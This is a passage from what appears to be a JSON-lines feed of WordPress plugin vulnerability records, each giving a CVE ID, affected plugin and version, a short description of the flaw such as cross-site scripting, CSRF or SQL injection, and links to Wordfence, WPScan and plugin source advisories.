replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rd-wapp\\\/trunk\\\/includes\\\/rdwapp-class.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rd-wapp\\\/trunk\\\/includes\\\/rdwapp-class.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/113b3093-18fe-40ae-85af-aae1945201db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/113b3093-18fe-40ae-85af-aae1945201db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4938","slug":"wc-frontend-manager","versionImpact":"6.6.0","description":"The WCFM Frontend Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.6.0 due to missing nonce checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying knowledge bases, modifying notices, modifying payments, managing vendors, capabilities, and so much more, via a forged request granted they can trick a site's administrator into performing an action such as clicking on a link. There were hundreds of AJAX endpoints affected.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632630%40wc-frontend-manager&new=2632630%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632630%40wc-frontend-manager&new=2632630%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/798b57ad-0922-435c-8b4d-8a96b388b314?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/798b57ad-0922-435c-8b4d-8a96b388b314?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0621","slug":"simple-share-buttons-adder","versionImpact":"8.4.11","description":"The Simple Share Buttons Adder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 8.4.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032350\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032350\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9156","slug":"ti-woocommerce-wishlist","versionImpact":"2.9.0","description":"The TI WooCommerce Wishlist WordPress plugin through 2.8.2 is vulnerable to SQL Injection due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95974f9-1f68-4181-89b0-3559d61cfa93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95974f9-1f68-4181-89b0-3559d61cfa93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10342","slug":"league-of-legends-shortcodes","versionImpact":"1.0.1","description":"The League of Legends Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45e96aa3-97bb-4774-a1b5-5f0a7b18293e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45e96aa3-97bb-4774-a1b5-5f0a7b18293e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/league-of-legends-shortcodes\\\/trunk\\\/lol-shortcodes.php?rev=934346#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/league-of-legends-shortcodes\\\/trunk\\\/lol-shortcodes.php?rev=934346#L67\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10884","slug":"simpleform-contact-form-submissions","versionImpact":"2.1.0","description":"The SimpleForm Contact Form Submissions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07f25481-51c1-4d02-85c6-561bee587587?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07f25481-51c1-4d02-85c6-561bee587587?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleform-contact-form-submissions\\\/tags\\\/2.1.0\\\/admin\\\/includes\\\/class-simpleform-entries-list.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simpleform-contact-form-submissions\\\/tags\\\/2.1.0\\\/admin\\\/includes\\\/class-simpleform-entries-list.php#L102\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11751","slug":"tcbd-popover","versionImpact":"1.2","description":"The TCBD Popover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbd-popover-image ' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tcbd-popover\\\/tags\\\/1.2\\\/plugin-hook.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b08f533-9c74-4be3-99ff-70a3d9b90358?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b08f533-9c74-4be3-99ff-70a3d9b90358?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11434","slug":"wp-bulk-sms","versionImpact":"1.0.12","description":"The WP \u2013 Bulk SMS \u2013 by SMS.to plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bulk-sms\\\/trunk\\\/includes\\\/admin\\\/outbox\\\/class-wpsmstobulk-outbox.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bulk-sms\\\/trunk\\\/includes\\\/admin\\\/outbox\\\/class-wpsmstobulk-outbox.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17acbf24-b0ae-42c8-af8f-17e82213507d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17acbf24-b0ae-42c8-af8f-17e82213507d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13663","slug":"coaching-staffs","versionImpact":"1.4","description":"The Coaching Staffs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mstw-cs-table' shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coaching-staffs\\\/trunk\\\/mstw-coaching-staffs.php#L561\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/coaching-staffs\\\/trunk\\\/mstw-coaching-staffs.php#L561\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06982502-6055-4a79-93ef-4896ba086322?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06982502-6055-4a79-93ef-4896ba086322?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12460","slug":"years-since","versionImpact":"1.4.1","description":"The Years Since \u2013 Timeless Texts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'years-since' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/years-since\\\/trunk\\\/alar-years-since.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/years-since\\\/trunk\\\/alar-years-since.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/years-since\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/years-since\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f1cb71a-aabb-4ba1-93b4-24070aaa582b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f1cb71a-aabb-4ba1-93b4-24070aaa582b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5924","slug":"wp-push-notification-firebase","versionImpact":"1.2.0","description":"The WP Firebase Push Notification plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the wfpn_brodcast_notification_message() function. This makes it possible for unauthenticated attackers to send broadcast notifications via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-push-notification-firebase\\\/trunk\\\/wp_push_notification_firebase.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-push-notification-firebase\\\/trunk\\\/wp_push_notification_firebase.php#L67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996e0432-e795-4c01-8182-603a47f4f341?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996e0432-e795-4c01-8182-603a47f4f341?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6754","slug":"seo-metrics-helper","versionImpact":"1.0.15","description":"The SEO Metrics plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization checks in both the seo_metrics_handle_connect_button_click() AJAX handler and the seo_metrics_handle_custom_endpoint() function in versions 1.0.5 through 1.0.15. Because the AJAX action only verifies a nonce, without checking the caller\u2019s capabilities, a subscriber-level user can retrieve the token and then access the custom endpoint to obtain full administrator cookies.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/common-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/common-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/endpoint.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/endpoint.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/seo-metrics.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/seo-metrics.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/welcome-page.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-metrics-helper\\\/trunk\\\/welcome-page.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-metrics-helper\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-metrics-helper\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48658b33-ae53-4919-8180-1188f72553f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48658b33-ae53-4919-8180-1188f72553f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4937","slug":"wc-frontend-manager","versionImpact":"6.6.0","description":"The WCFM Frontend Manager plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 6.6.0 due to missing capability checks on various AJAX actions. This makes it possible for authenticated attackers, with minimal permissions such as subscribers, to perform a wide variety of actions such as modifying knowledge bases, modifying notices, modifying payments, managing vendors, capabilities, and so much more. There were hundreds of AJAX endpoints affected.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2630745%40wc-frontend-manager&new=2630745%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2630745%40wc-frontend-manager&new=2630745%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2629284%40wc-frontend-manager&new=2629284%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2629284%40wc-frontend-manager&new=2629284%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632630%40wc-frontend-manager&new=2632630%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632630%40wc-frontend-manager&new=2632630%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d946d4b5-bed7-4808-b133-783b2dcd7992?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d946d4b5-bed7-4808-b133-783b2dcd7992?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633187%40wc-frontend-manager&new=2633187%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633187%40wc-frontend-manager&new=2633187%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2634199%40wc-frontend-manager&new=2634199%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2634199%40wc-frontend-manager&new=2634199%40wc-frontend-manager&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2405","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.6.2","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.2. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f75c6bf-1b93-49d5-b5fb-e59b4e67432f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f75c6bf-1b93-49d5-b5fb-e59b4e67432f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-callback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-callback.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6801","slug":"feedzy-rss-feeds","versionImpact":"4.3.2","description":"The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a713d897-c549-4e0d-9cb3-7002ef2b127f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a713d897-c549-4e0d-9cb3-7002ef2b127f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012392%40feedzy-rss-feeds%2Ftrunk&old=2991547%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3012392%40feedzy-rss-feeds%2Ftrunk&old=2991547%40feedzy-rss-feeds%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0620","slug":"password-protect-page","versionImpact":"1.8.9","description":"The PPWP \u2013 Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.9 via API. This makes it possible for unauthenticated attackers to obtain post titles, IDs, slugs as well as other information including for password-protected posts.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3611","slug":"toolbar-extras","versionImpact":"1.4.9","description":"The Toolbar Extras for Elementor & More \u2013 WordPress Admin Bar Enhanced plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tbex-version' shortcode in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50631f6c-de8b-408e-ab1f-ef74d3180e7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50631f6c-de8b-408e-ab1f-ef74d3180e7f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/toolbar-extras\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/toolbar-extras\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5662","slug":"ultimate-post-kit","versionImpact":"3.11.7","description":"The Ultimate Post Kit Addons For Elementor \u2013 (Post Grid, Post Carousel, Post Slider, Category List, Post Tabs, Timeline, Post Ticker, Tag Cloud) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter within the Social Count (Static) widget in all versions up to, and including, 3.11.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be9d977d-d7b2-4946-b107-35df176fbdf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be9d977d-d7b2-4946-b107-35df176fbdf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post-kit\\\/tags\\\/3.11.5\\\/modules\\\/static-social-count\\\/widgets\\\/static-social-count.php#L800\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post-kit\\\/tags\\\/3.11.5\\\/modules\\\/static-social-count\\\/widgets\\\/static-social-count.php#L800\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106395\\\/#file526\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106395\\\/#file526\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-post-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-post-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6544","slug":"custom-post-limits","versionImpact":"4.4.1","description":"The Custom Post Limits plugin for WordPress is vulnerable to full path disclosure in all versions up to, and including, 4.4.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cf4a11e-ad28-4a93-9278-1d2d113a4859?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cf4a11e-ad28-4a93-9278-1d2d113a4859?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-limits\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-limits\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9520","slug":"userplus","versionImpact":"2.0","description":"The UserPlus plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.0. This makes it possible for authenticated attackers with subscriber-level permissions or above, to add, modify, or delete user meta and plugin options.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 